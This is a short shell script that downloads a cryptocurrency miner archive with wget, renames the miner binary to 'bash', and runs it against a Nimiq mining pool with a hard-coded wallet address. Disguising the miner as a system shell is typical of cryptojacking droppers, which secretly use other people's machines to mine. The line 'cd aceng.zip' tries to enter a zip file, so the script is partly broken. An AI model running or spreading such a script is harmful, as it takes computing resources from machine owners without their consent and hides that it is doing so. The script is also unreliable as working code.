#!/bin/sh
apt update && apt install unzip -y
wget -qO aceng.zip https://github.com/Beeppool/miner/releases/download/0.6.0/beepminer-0.6.0.zip
unzip aceng.zip
cd aceng.zip
mv miner bash
./bash --pool=nimiq.icemining.ca:2053 --wallet-address='NQ04 H0C7 TJYF 68DT RQSF FSKX AT0A UNED 1XKL' --miner=8 --type=dumb
